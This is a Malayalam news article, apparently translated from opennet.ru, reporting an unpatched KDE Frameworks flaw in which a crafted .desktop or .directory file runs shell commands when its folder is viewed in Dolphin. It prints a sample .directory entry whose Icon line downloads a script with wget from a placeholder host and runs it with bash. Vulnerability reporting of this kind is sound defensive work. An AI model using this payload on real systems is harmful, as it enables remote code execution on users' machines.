ഫയലുകളുടെ ഒരു ലിസ്റ്റ് കാണുമ്പോൾ കെഡിഇ കോഡ് എക്സിക്യൂഷൻ ദുർബലത

കെഡിഇയിൽ തിരിച്ചറിഞ്ഞു ദുർബലത, ഒരു ഉപയോക്താവ് പ്രത്യേകം രൂപകല്പന ചെയ്ത ".desktop", ".directory" ഫയലുകൾ അടങ്ങിയ ഒരു ഡയറക്ടറിയോ ആർക്കൈവോ കാണുമ്പോൾ, ആക്രമണകാരിയെ അനിയന്ത്രിതമായ കമാൻഡുകൾ നടപ്പിലാക്കാൻ ഇത് അനുവദിക്കുന്നു. ഒരു ആക്രമണത്തിന് ഉപയോക്താവ് ഡോൾഫിൻ ഫയൽ മാനേജറിലെ ഫയലുകളുടെ ഒരു ലിസ്റ്റ് കാണുകയോ ക്ഷുദ്രകരമായ ഡെസ്‌ക്‌ടോപ്പ് ഫയൽ ഡൗൺലോഡ് ചെയ്യുകയോ ഡെസ്‌ക്‌ടോപ്പിലേക്കോ ഡോക്യുമെന്റിലേക്കോ കുറുക്കുവഴി വലിച്ചിടുകയോ ചെയ്യേണ്ടതുണ്ട്. ഗ്രന്ഥശാലകളുടെ നിലവിലെ റിലീസിലാണ് പ്രശ്നം പ്രകടമാകുന്നത് കെഡിഇ ചട്ടക്കൂടുക 5.60.0 കെഡിഇ 4 വരെയുള്ള പഴയ പതിപ്പുകളും. അപകടസാധ്യത ഇപ്പോഴും നിലനിൽക്കുന്നു അവശേഷിക്കുന്നു തിരുത്താത്തത് (CVE നിയോഗിച്ചിട്ടില്ല).

KDesktopFile ക്ലാസ്സിന്റെ തെറ്റായ നിർവ്വഹണമാണ് പ്രശ്‌നത്തിന് കാരണം, അത് "ഐക്കൺ" വേരിയബിൾ പ്രോസസ്സ് ചെയ്യുമ്പോൾ, ശരിയായ രക്ഷപ്പെടൽ കൂടാതെ, KConfigPrivate::expandString() ഫംഗ്‌ഷനിലേക്ക് മൂല്യം കൈമാറുന്നു, ഇത് പ്രോസസ്സിംഗ് ഉൾപ്പെടെയുള്ള ഷെൽ പ്രത്യേക പ്രതീകങ്ങളുടെ വികാസം നിർവ്വഹിക്കുന്നു. "$(..)" എന്ന സ്ട്രിംഗുകൾ എക്സിക്യൂട്ട് ചെയ്യേണ്ട കമാൻഡുകൾ ആയി . XDG സ്പെസിഫിക്കേഷന്റെ ആവശ്യകതകൾക്ക് വിരുദ്ധമായി, നടപ്പിലാക്കൽ വെളിപ്പെടുത്തൽ ക്രമീകരണങ്ങളുടെ തരം വേർതിരിക്കാതെയാണ് ഷെൽ നിർമ്മാണങ്ങൾ നിർമ്മിക്കുന്നത്, അതായത്. സമാരംഭിക്കേണ്ട ആപ്ലിക്കേഷന്റെ കമാൻഡ് ലൈൻ നിർണ്ണയിക്കുമ്പോൾ മാത്രമല്ല, സ്ഥിരസ്ഥിതിയായി പ്രദർശിപ്പിച്ചിരിക്കുന്ന ഐക്കണുകൾ വ്യക്തമാക്കുമ്പോഴും.

ഉദാഹരണത്തിന്, ആക്രമിക്കാൻ മതി ".directory" ഫയൽ അടങ്ങുന്ന ഒരു ഡയറക്‌ടറി ഉള്ള ഒരു zip ആർക്കൈവ് ഉപയോക്താവിന് അയയ്ക്കുക:

[ഡെസ്ക്ടോപ്പ് എൻട്രി] തരം=ഡയറക്‌ടറി
ഐക്കൺ[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

നിങ്ങൾ ഡോൾഫിൻ ഫയൽ മാനേജറിൽ ആർക്കൈവിന്റെ ഉള്ളടക്കങ്ങൾ കാണാൻ ശ്രമിക്കുമ്പോൾ, https://example.com/FILENAME.sh എന്ന സ്‌ക്രിപ്റ്റ് ഡൗൺലോഡ് ചെയ്‌ത് എക്‌സിക്യൂട്ട് ചെയ്യപ്പെടും.


അവലംബം: opennet.ru

ഒരു അഭിപ്രായം ചേർക്കുക